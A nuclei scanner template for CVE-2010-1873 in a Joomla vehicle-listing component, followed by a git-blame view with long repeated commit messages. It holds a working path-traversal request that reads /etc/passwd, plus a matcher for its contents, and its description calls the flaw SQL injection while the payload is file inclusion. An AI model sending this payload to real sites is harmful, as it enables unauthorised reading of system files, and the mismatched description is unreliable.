nuclei-templates/cves/2010/CVE-2010-1873.yaml

id: CVE-2010-1873
info:
  name: Joomla! Component Jvehicles - Local File Inclusion
  author: daffainfo
  severity: high
  description: A SQL injection vulnerability in the Jvehicles (com_jvehicles) component 1.0, 2.0, and 2.1111 for Joomla! allows remote attackers to execute arbitrary SQL commands via the aid parameter in an agentlisting action to index.php.
  remediation: Upgrade to a supported version.
  reference:
    - https://www.exploit-db.com/exploits/11997
    - https://www.cvedetails.com/cve/CVE-2010-1873
  tags: cve,cve2010,joomla,lfi
  classification:
    cve-id: CVE-2010-1873
requests:
  - method: GET
    path:
      - "{{BaseURL}}/index.php?option=com_jvehicles&controller=../../../../../../../../../../etc/passwd%00"
    matchers-condition: and
    matchers:
      - type: regex
        regex:
          - "root:.*:0:0"
      - type: status
        status:
          - 200
# Enhanced by mp on 2022/02/15
Adding daffainfo templates 2021-09-27 11:02:48 +00:00			`id: CVE-2010-1873`
			`info:`
			`name: Joomla! Component Jvehicles - Local File Inclusion`
			`author: daffainfo`
			`severity: high`
Dashboard Content Enhancements (#3711) * Enhancement: cves/2010/CVE-2010-1353.yaml by mp * Enhancement: cves/2010/CVE-2010-1352.yaml by mp * Enhancement: cves/2010/CVE-2010-1345.yaml by mp * Enhancement: cves/2010/CVE-2010-1340.yaml by mp * Enhancement: cves/2010/CVE-2010-1345.yaml by mp * Enhancement: cves/2010/CVE-2010-1315.yaml by mp * Enhancement: cves/2010/CVE-2010-1314.yaml by mp * Enhancement: cves/2010/CVE-2010-1313.yaml by mp * Enhancement: cves/2010/CVE-2010-1312.yaml by mp * Enhancement: cves/2010/CVE-2010-1308.yaml by mp * Enhancement: cves/2010/CVE-2010-1307.yaml by mp * Enhancement: cves/2010/CVE-2010-1306.yaml by mp * Enhancement: cves/2010/CVE-2010-1305.yaml by mp * Enhancement: cves/2010/CVE-2010-1304.yaml by mp * Enhancement: cves/2010/CVE-2010-1302.yaml by mp * Enhancement: cves/2010/CVE-2010-1219.yaml by mp * Enhancement: cves/2010/CVE-2010-1352.yaml by mp * Enhancement: cves/2010/CVE-2010-1354.yaml by mp * Enhancement: cves/2010/CVE-2010-1461.yaml by mp * Enhancement: cves/2010/CVE-2010-1469.yaml by mp * Enhancement: cves/2010/CVE-2010-1470.yaml by mp * Enhancement: cves/2010/CVE-2010-1471.yaml by mp * Enhancement: cves/2010/CVE-2010-1472.yaml by mp * Enhancement: cves/2010/CVE-2010-1473.yaml by mp * Enhancement: cves/2010/CVE-2010-1474.yaml by mp * Enhancement: cves/2010/CVE-2010-1475.yaml by mp * Enhancement: cves/2010/CVE-2010-1476.yaml by mp * Enhancement: cves/2010/CVE-2010-1478.yaml by mp * Enhancement: cves/2010/CVE-2010-1491.yaml by mp * Enhancement: cves/2010/CVE-2010-1494.yaml by mp * Enhancement: cves/2010/CVE-2010-1495.yaml by mp * Enhancement: cves/2010/CVE-2010-1531.yaml by mp * Enhancement: cves/2010/CVE-2010-1473.yaml by mp * Enhancement: misconfiguration/proxy/metadata-alibaba.yaml by cs * Enhancement: misconfiguration/proxy/metadata-openstack.yaml by cs * Enhancement: misconfiguration/proxy/metadata-oracle.yaml by cs * Enhancement: cves/2016/CVE-2016-4975.yaml by cs * Enhancement: misconfiguration/proxy/metadata-openstack.yaml by cs * Enhancement: misconfiguration/proxy/metadata-oracle.yaml by cs * Enhancement: misconfiguration/proxy/metadata-openstack.yaml by cs * Enhancement: misconfiguration/proxy/metadata-digitalocean.yaml by cs * Enhancement: misconfiguration/proxy/metadata-alibaba.yaml by cs * Enhancement: misconfiguration/proxy/metadata-hetzner.yaml by cs * Enhancement: misconfiguration/proxy/metadata-aws.yaml by cs * Enhancement: misconfiguration/proxy/metadata-google.yaml by cs * Enhancement: misconfiguration/proxy/metadata-azure.yaml by cs * Enhancement: misconfiguration/proxy/open-proxy-localhost.yaml by cs * Enhancement: misconfiguration/proxy/open-proxy-internal.yaml by cs * Enhancement: cves/2021/CVE-2021-1497.yaml by cs * Spacing fixes and enhancement to CNVD-2019-01348.yaml * Spacing fixes, and enhancement to CNVD-2019-01348.yaml * Merge artifact * Spacing * Minor tags cleanup * Enhancement: cves/2010/CVE-2010-1532.yaml by mp * Enhancement: cves/2010/CVE-2010-1533.yaml by mp * Enhancement: cves/2010/CVE-2010-1534.yaml by mp * Enhancement: cves/2010/CVE-2010-1535.yaml by mp * Enhancement: cves/2010/CVE-2010-1540.yaml by mp * Enhancement: cves/2010/CVE-2010-1601.yaml by mp * Enhancement: cves/2010/CVE-2010-1602.yaml by mp * Enhancement: cves/2010/CVE-2010-1603.yaml by mp * Enhancement: cves/2010/CVE-2010-1607.yaml by mp * Enhancement: cves/2010/CVE-2010-1653.yaml by mp * Enhancement: cves/2010/CVE-2010-1657.yaml by mp * Enhancement: cves/2010/CVE-2010-1657.yaml by mp * Enhancement: cves/2010/CVE-2010-1658.yaml by mp * Enhancement: cves/2010/CVE-2010-1659.yaml by mp * Enhancement: cves/2010/CVE-2010-1714.yaml by mp * Enhancement: cves/2010/CVE-2010-1715.yaml by mp * Enhancement: cves/2010/CVE-2010-1532.yaml by mp * Enhancement: cves/2010/CVE-2010-1533.yaml by mp * Enhancement: cves/2010/CVE-2010-1534.yaml by mp * Enhancement: cves/2010/CVE-2010-1534.yaml by mp * Enhancement: cves/2010/CVE-2010-1535.yaml by mp * Enhancement: cves/2010/CVE-2010-1540.yaml by mp * Enhancement: cves/2010/CVE-2010-1540.yaml by mp * Enhancement: cves/2010/CVE-2010-1717.yaml by mp * Enhancement: cves/2010/CVE-2010-1718.yaml by mp * Enhancement: cves/2010/CVE-2010-1719.yaml by mp * Enhancement: cves/2010/CVE-2010-1722.yaml by mp * Enhancement: cves/2010/CVE-2010-1723.yaml by mp * Enhancement: cves/2010/CVE-2010-1858.yaml by mp * Enhancement: cves/2010/CVE-2010-1873.yaml by mp * Enhancement: cves/2010/CVE-2010-1870.yaml by mp * Enhancement: cves/2010/CVE-2010-1875.yaml by mp * Enhancement: cves/2010/CVE-2010-1878.yaml by mp * Enhancement: cves/2010/CVE-2010-1952.yaml by mp * Enhancement: cves/2010/CVE-2010-1953.yaml by mp * Enhancement: cves/2010/CVE-2010-1954.yaml by mp * Enhancement: cves/2010/CVE-2010-1955.yaml by mp * Enhancement: cves/2010/CVE-2010-1956.yaml by mp * Information Enhancements Co-authored-by: sullo <sullo@cirt.net> 2022-02-15 22:47:54 +00:00			`description: A SQL injection vulnerability in the Jvehicles (com_jvehicles) component 1.0, 2.0, and 2.1111 for Joomla! allows remote attackers to execute arbitrary SQL commands via the aid parameter in an agentlisting action to index.php.`
			`remediation: Upgrade to a supported version.`
updates 2021-09-27 13:06:48 +00:00			`reference:`
Adding daffainfo templates 2021-09-27 11:02:48 +00:00			`- https://www.exploit-db.com/exploits/11997`
			`- https://www.cvedetails.com/cve/CVE-2010-1873`
			`tags: cve,cve2010,joomla,lfi`
Dashboard Content Enhancements (#3711) * Enhancement: cves/2010/CVE-2010-1353.yaml by mp * Enhancement: cves/2010/CVE-2010-1352.yaml by mp * Enhancement: cves/2010/CVE-2010-1345.yaml by mp * Enhancement: cves/2010/CVE-2010-1340.yaml by mp * Enhancement: cves/2010/CVE-2010-1345.yaml by mp * Enhancement: cves/2010/CVE-2010-1315.yaml by mp * Enhancement: cves/2010/CVE-2010-1314.yaml by mp * Enhancement: cves/2010/CVE-2010-1313.yaml by mp * Enhancement: cves/2010/CVE-2010-1312.yaml by mp * Enhancement: cves/2010/CVE-2010-1308.yaml by mp * Enhancement: cves/2010/CVE-2010-1307.yaml by mp * Enhancement: cves/2010/CVE-2010-1306.yaml by mp * Enhancement: cves/2010/CVE-2010-1305.yaml by mp * Enhancement: cves/2010/CVE-2010-1304.yaml by mp * Enhancement: cves/2010/CVE-2010-1302.yaml by mp * Enhancement: cves/2010/CVE-2010-1219.yaml by mp * Enhancement: cves/2010/CVE-2010-1352.yaml by mp * Enhancement: cves/2010/CVE-2010-1354.yaml by mp * Enhancement: cves/2010/CVE-2010-1461.yaml by mp * Enhancement: cves/2010/CVE-2010-1469.yaml by mp * Enhancement: cves/2010/CVE-2010-1470.yaml by mp * Enhancement: cves/2010/CVE-2010-1471.yaml by mp * Enhancement: cves/2010/CVE-2010-1472.yaml by mp * Enhancement: cves/2010/CVE-2010-1473.yaml by mp * Enhancement: cves/2010/CVE-2010-1474.yaml by mp * Enhancement: cves/2010/CVE-2010-1475.yaml by mp * Enhancement: cves/2010/CVE-2010-1476.yaml by mp * Enhancement: cves/2010/CVE-2010-1478.yaml by mp * Enhancement: cves/2010/CVE-2010-1491.yaml by mp * Enhancement: cves/2010/CVE-2010-1494.yaml by mp * Enhancement: cves/2010/CVE-2010-1495.yaml by mp * Enhancement: cves/2010/CVE-2010-1531.yaml by mp * Enhancement: cves/2010/CVE-2010-1473.yaml by mp * Enhancement: misconfiguration/proxy/metadata-alibaba.yaml by cs * Enhancement: misconfiguration/proxy/metadata-openstack.yaml by cs * Enhancement: misconfiguration/proxy/metadata-oracle.yaml by cs * Enhancement: cves/2016/CVE-2016-4975.yaml by cs * Enhancement: misconfiguration/proxy/metadata-openstack.yaml by cs * Enhancement: misconfiguration/proxy/metadata-oracle.yaml by cs * Enhancement: misconfiguration/proxy/metadata-openstack.yaml by cs * Enhancement: misconfiguration/proxy/metadata-digitalocean.yaml by cs * Enhancement: misconfiguration/proxy/metadata-alibaba.yaml by cs * Enhancement: misconfiguration/proxy/metadata-hetzner.yaml by cs * Enhancement: misconfiguration/proxy/metadata-aws.yaml by cs * Enhancement: misconfiguration/proxy/metadata-google.yaml by cs * Enhancement: misconfiguration/proxy/metadata-azure.yaml by cs * Enhancement: misconfiguration/proxy/open-proxy-localhost.yaml by cs * Enhancement: misconfiguration/proxy/open-proxy-internal.yaml by cs * Enhancement: cves/2021/CVE-2021-1497.yaml by cs * Spacing fixes and enhancement to CNVD-2019-01348.yaml * Spacing fixes, and enhancement to CNVD-2019-01348.yaml * Merge artifact * Spacing * Minor tags cleanup * Enhancement: cves/2010/CVE-2010-1532.yaml by mp * Enhancement: cves/2010/CVE-2010-1533.yaml by mp * Enhancement: cves/2010/CVE-2010-1534.yaml by mp * Enhancement: cves/2010/CVE-2010-1535.yaml by mp * Enhancement: cves/2010/CVE-2010-1540.yaml by mp * Enhancement: cves/2010/CVE-2010-1601.yaml by mp * Enhancement: cves/2010/CVE-2010-1602.yaml by mp * Enhancement: cves/2010/CVE-2010-1603.yaml by mp * Enhancement: cves/2010/CVE-2010-1607.yaml by mp * Enhancement: cves/2010/CVE-2010-1653.yaml by mp * Enhancement: cves/2010/CVE-2010-1657.yaml by mp * Enhancement: cves/2010/CVE-2010-1657.yaml by mp * Enhancement: cves/2010/CVE-2010-1658.yaml by mp * Enhancement: cves/2010/CVE-2010-1659.yaml by mp * Enhancement: cves/2010/CVE-2010-1714.yaml by mp * Enhancement: cves/2010/CVE-2010-1715.yaml by mp * Enhancement: cves/2010/CVE-2010-1532.yaml by mp * Enhancement: cves/2010/CVE-2010-1533.yaml by mp * Enhancement: cves/2010/CVE-2010-1534.yaml by mp * Enhancement: cves/2010/CVE-2010-1534.yaml by mp * Enhancement: cves/2010/CVE-2010-1535.yaml by mp * Enhancement: cves/2010/CVE-2010-1540.yaml by mp * Enhancement: cves/2010/CVE-2010-1540.yaml by mp * Enhancement: cves/2010/CVE-2010-1717.yaml by mp * Enhancement: cves/2010/CVE-2010-1718.yaml by mp * Enhancement: cves/2010/CVE-2010-1719.yaml by mp * Enhancement: cves/2010/CVE-2010-1722.yaml by mp * Enhancement: cves/2010/CVE-2010-1723.yaml by mp * Enhancement: cves/2010/CVE-2010-1858.yaml by mp * Enhancement: cves/2010/CVE-2010-1873.yaml by mp * Enhancement: cves/2010/CVE-2010-1870.yaml by mp * Enhancement: cves/2010/CVE-2010-1875.yaml by mp * Enhancement: cves/2010/CVE-2010-1878.yaml by mp * Enhancement: cves/2010/CVE-2010-1952.yaml by mp * Enhancement: cves/2010/CVE-2010-1953.yaml by mp * Enhancement: cves/2010/CVE-2010-1954.yaml by mp * Enhancement: cves/2010/CVE-2010-1955.yaml by mp * Enhancement: cves/2010/CVE-2010-1956.yaml by mp * Information Enhancements Co-authored-by: sullo <sullo@cirt.net> 2022-02-15 22:47:54 +00:00			`classification:`
			`cve-id: CVE-2010-1873`
Adding daffainfo templates 2021-09-27 11:02:48 +00:00			`requests:`
			`- method: GET`
			`path:`
			`- "{{BaseURL}}/index.php?option=com_jvehicles&controller=../../../../../../../../../../etc/passwd%00"`
			`matchers-condition: and`
			`matchers:`
			`- type: regex`
			`regex:`
			`- "root:.*:0:0"`
			`- type: status`
			`status:`
Dashboard Content Enhancements (#3711) * Enhancement: cves/2010/CVE-2010-1353.yaml by mp * Enhancement: cves/2010/CVE-2010-1352.yaml by mp * Enhancement: cves/2010/CVE-2010-1345.yaml by mp * Enhancement: cves/2010/CVE-2010-1340.yaml by mp * Enhancement: cves/2010/CVE-2010-1345.yaml by mp * Enhancement: cves/2010/CVE-2010-1315.yaml by mp * Enhancement: cves/2010/CVE-2010-1314.yaml by mp * Enhancement: cves/2010/CVE-2010-1313.yaml by mp * Enhancement: cves/2010/CVE-2010-1312.yaml by mp * Enhancement: cves/2010/CVE-2010-1308.yaml by mp * Enhancement: cves/2010/CVE-2010-1307.yaml by mp * Enhancement: cves/2010/CVE-2010-1306.yaml by mp * Enhancement: cves/2010/CVE-2010-1305.yaml by mp * Enhancement: cves/2010/CVE-2010-1304.yaml by mp * Enhancement: cves/2010/CVE-2010-1302.yaml by mp * Enhancement: cves/2010/CVE-2010-1219.yaml by mp * Enhancement: cves/2010/CVE-2010-1352.yaml by mp * Enhancement: cves/2010/CVE-2010-1354.yaml by mp * Enhancement: cves/2010/CVE-2010-1461.yaml by mp * Enhancement: cves/2010/CVE-2010-1469.yaml by mp * Enhancement: cves/2010/CVE-2010-1470.yaml by mp * Enhancement: cves/2010/CVE-2010-1471.yaml by mp * Enhancement: cves/2010/CVE-2010-1472.yaml by mp * Enhancement: cves/2010/CVE-2010-1473.yaml by mp * Enhancement: cves/2010/CVE-2010-1474.yaml by mp * Enhancement: cves/2010/CVE-2010-1475.yaml by mp * Enhancement: cves/2010/CVE-2010-1476.yaml by mp * Enhancement: cves/2010/CVE-2010-1478.yaml by mp * Enhancement: cves/2010/CVE-2010-1491.yaml by mp * Enhancement: cves/2010/CVE-2010-1494.yaml by mp * Enhancement: cves/2010/CVE-2010-1495.yaml by mp * Enhancement: cves/2010/CVE-2010-1531.yaml by mp * Enhancement: cves/2010/CVE-2010-1473.yaml by mp * Enhancement: misconfiguration/proxy/metadata-alibaba.yaml by cs * Enhancement: misconfiguration/proxy/metadata-openstack.yaml by cs * Enhancement: misconfiguration/proxy/metadata-oracle.yaml by cs * Enhancement: cves/2016/CVE-2016-4975.yaml by cs * Enhancement: misconfiguration/proxy/metadata-openstack.yaml by cs * Enhancement: misconfiguration/proxy/metadata-oracle.yaml by cs * Enhancement: misconfiguration/proxy/metadata-openstack.yaml by cs * Enhancement: misconfiguration/proxy/metadata-digitalocean.yaml by cs * Enhancement: misconfiguration/proxy/metadata-alibaba.yaml by cs * Enhancement: misconfiguration/proxy/metadata-hetzner.yaml by cs * Enhancement: misconfiguration/proxy/metadata-aws.yaml by cs * Enhancement: misconfiguration/proxy/metadata-google.yaml by cs * Enhancement: misconfiguration/proxy/metadata-azure.yaml by cs * Enhancement: misconfiguration/proxy/open-proxy-localhost.yaml by cs * Enhancement: misconfiguration/proxy/open-proxy-internal.yaml by cs * Enhancement: cves/2021/CVE-2021-1497.yaml by cs * Spacing fixes and enhancement to CNVD-2019-01348.yaml * Spacing fixes, and enhancement to CNVD-2019-01348.yaml * Merge artifact * Spacing * Minor tags cleanup * Enhancement: cves/2010/CVE-2010-1532.yaml by mp * Enhancement: cves/2010/CVE-2010-1533.yaml by mp * Enhancement: cves/2010/CVE-2010-1534.yaml by mp * Enhancement: cves/2010/CVE-2010-1535.yaml by mp * Enhancement: cves/2010/CVE-2010-1540.yaml by mp * Enhancement: cves/2010/CVE-2010-1601.yaml by mp * Enhancement: cves/2010/CVE-2010-1602.yaml by mp * Enhancement: cves/2010/CVE-2010-1603.yaml by mp * Enhancement: cves/2010/CVE-2010-1607.yaml by mp * Enhancement: cves/2010/CVE-2010-1653.yaml by mp * Enhancement: cves/2010/CVE-2010-1657.yaml by mp * Enhancement: cves/2010/CVE-2010-1657.yaml by mp * Enhancement: cves/2010/CVE-2010-1658.yaml by mp * Enhancement: cves/2010/CVE-2010-1659.yaml by mp * Enhancement: cves/2010/CVE-2010-1714.yaml by mp * Enhancement: cves/2010/CVE-2010-1715.yaml by mp * Enhancement: cves/2010/CVE-2010-1532.yaml by mp * Enhancement: cves/2010/CVE-2010-1533.yaml by mp * Enhancement: cves/2010/CVE-2010-1534.yaml by mp * Enhancement: cves/2010/CVE-2010-1534.yaml by mp * Enhancement: cves/2010/CVE-2010-1535.yaml by mp * Enhancement: cves/2010/CVE-2010-1540.yaml by mp * Enhancement: cves/2010/CVE-2010-1540.yaml by mp * Enhancement: cves/2010/CVE-2010-1717.yaml by mp * Enhancement: cves/2010/CVE-2010-1718.yaml by mp * Enhancement: cves/2010/CVE-2010-1719.yaml by mp * Enhancement: cves/2010/CVE-2010-1722.yaml by mp * Enhancement: cves/2010/CVE-2010-1723.yaml by mp * Enhancement: cves/2010/CVE-2010-1858.yaml by mp * Enhancement: cves/2010/CVE-2010-1873.yaml by mp * Enhancement: cves/2010/CVE-2010-1870.yaml by mp * Enhancement: cves/2010/CVE-2010-1875.yaml by mp * Enhancement: cves/2010/CVE-2010-1878.yaml by mp * Enhancement: cves/2010/CVE-2010-1952.yaml by mp * Enhancement: cves/2010/CVE-2010-1953.yaml by mp * Enhancement: cves/2010/CVE-2010-1954.yaml by mp * Enhancement: cves/2010/CVE-2010-1955.yaml by mp * Enhancement: cves/2010/CVE-2010-1956.yaml by mp * Information Enhancements Co-authored-by: sullo <sullo@cirt.net> 2022-02-15 22:47:54 +00:00			`- 200`
			`# Enhanced by mp on 2022/02/15`